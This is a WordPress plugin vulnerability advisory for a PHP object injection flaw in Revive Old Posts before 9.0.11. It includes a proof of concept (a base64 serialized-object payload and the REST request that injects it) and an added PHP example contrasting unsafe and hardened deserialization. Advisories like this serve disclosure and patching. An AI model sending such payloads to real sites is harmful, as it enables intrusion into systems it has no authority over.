WordPress Plugin Vulnerabilities

Revive Old Posts – Social Media Auto Post and Scheduling Plugin < 9.0.11 - PHP Object Injection

Description

The plugin unserializes user input provided via its settings, which could allow high-privilege users such as admins to perform PHP Object Injection when a suitable gadget is present.

Proof of Concept

To simulate a gadget chain, put the following code in a plugin:

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Use the add account function, intercept the request, and add or replace the id or pages parameter with Tzo0OiJFdmlsIjowOnt9Ow== (the base64 encoding of O:4:"Evil":0:{};):

POST /wp-json/tweet-old-post/v8/api/?req=add_account_fb HTTP/1.1

{"id":"Tzo0OiJFdmlsIjowOnt9Ow==","pages":["Tzo0OiJFdmlsIjowOnt9Ow=="]}
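
For plugin authors, the following added example (not the plugin's code, and not taken from the 9.0.11 fix) contrasts the unserialize-on-user-input pattern described above with a decoder that refuses serialized objects. The function names are hypothetical, and the Evil class records a flag instead of calling die() so both paths can be compared in one run.

```php
<?php
// Added illustration, not the plugin's code; function names are hypothetical. PHP 7.4+.

// Stand-in gadget from the proof of concept; sets a flag instead of die().
class Evil {
    public static bool $fired = false;
    public function __wakeup(): void { self::$fired = true; }
}

// Pattern the description warns about: request data passed straight to unserialize().
function decode_setting_unsafe(string $b64) {
    return @unserialize(base64_decode($b64));
}

// True if the value is, or contains, any object (including __PHP_Incomplete_Class).
function contains_object($value): bool {
    if (is_object($value)) {
        return true;
    }
    foreach (is_array($value) ? $value : [] as $item) {
        if (contains_object($item)) {
            return true;
        }
    }
    return false;
}

// Hardened decoder: strict base64, no class instantiation, plain data only.
function decode_setting_safe(string $b64) {
    $raw = base64_decode($b64, true);
    if ($raw === false) {
        throw new InvalidArgumentException('not valid base64');
    }
    // allowed_classes => false turns every object into __PHP_Incomplete_Class,
    // so no __wakeup() or __destruct() of a real class can run.
    $value = @unserialize($raw, ['allowed_classes' => false]);
    if (($value === false && $raw !== serialize(false)) || contains_object($value)) {
        throw new InvalidArgumentException('expected serialized scalars or arrays only');
    }
    return $value;
}

$payload = 'Tzo0OiJFdmlsIjowOnt9Ow=='; // value from the proof of concept
decode_setting_unsafe($payload);
printf("unsafe decoder, __wakeup fired: %s\n", var_export(Evil::$fired, true));

Evil::$fired = false;
try { decode_setting_safe($payload); } catch (InvalidArgumentException $e) { echo $e->getMessage(), "\n"; }
printf("safe decoder, __wakeup fired: %s\n", var_export(Evil::$fired, true));
```

Where the stored value is plain data, encoding it with json_encode() and reading it back with json_decode() removes the object-instantiation path altogether.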

Affects Plugins

Fixed in 9.0.11

References

Classification

Type
OBJECT INJECTION
CWE
CVSS

Miscellaneous

Original Researcher
Nguyen Huu Do
Submitter
Nguyen Huu Do
Verified
Yes

Timeline

Publicly Published
2023-01-04
Added
2023-01-04
Last Updated
2023-01-04

Other